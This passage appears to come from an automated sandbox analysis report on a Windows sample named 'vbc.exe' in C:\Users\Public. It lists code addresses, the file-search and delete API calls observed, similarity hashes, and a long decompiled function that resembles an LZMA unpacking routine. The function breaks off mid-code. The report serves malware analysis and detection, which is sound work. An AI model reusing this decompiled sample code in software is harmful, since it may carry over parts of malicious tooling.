0x00405b1e
0x00405b21
0x00405b35
0x00405b23
0x00405b26
0x00405b2e
0x00405b2e
0x00405b21
0x00405afc
0x00405b02
0x00405b04
0x00405b0a
0x00405b0a
0x00405b04
0x00000000
0x00405afa
0x00405ac8
0x00405ad0
0x00000000
0x00000000
0x00405ad2
0x00405ada
0x00000000
0x00000000
0x00405adc
0x00405ae4
0x00000000
0x00000000
0x00000000
0x00405b45
0x00405b4d
0x00405b53
0x00405b53
0x00405b5c
0x00000000
0x00405b5c
0x00405a87
0x00405a8f
0x00000000
0x00000000
0x00000000
0x00405a4b
0x00405a4b
0x00405a4d
0x00405b6d
0x00405b6f
0x00405b72
0x00405bc3
0x00405bc3
0x00405bc3
0x00405b74
0x00405b77
0x00405b82
0x00405b87
0x00405b89
0x00000000
0x00000000
0x00405b8c
0x00405b98
0x00405b9d
0x00405b9f
0x00000000
0x00405bba
0x00405ba1
0x00405ba4
0x00000000
0x00000000
0x00405ba9
0x00000000
0x00405bb0
0x00405b79
0x00405b79
0x00000000
0x00405b79
0x00405a53
0x00405a56
0x00000000
0x00000000
0x00000000
0x00405a56

APIs

DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405A2C
lstrcatW.KERNEL32 ref: 00405A74
lstrcatW.KERNEL32 ref: 00405A97
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,7556D4C4,755513E0,00000000), ref: 00405A9D
FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,7556D4C4,755513E0,00000000), ref: 00405AAD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
FindClose.KERNEL32(00000000), ref: 00405B5C

Strings

"C:\Users\Public\vbc.exe" , xrefs: 00405A03
0WB, xrefs: 00405A5C
\*.*, xrefs: 00405A6E

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\Public\vbc.exe" $0WB$\*.*
API String ID: 2035342205-1002228002
Opcode ID: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
Opcode Fuzzy Hash: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E

Uniqueness

Uniqueness Score: -1.00%

Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E004068DA() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
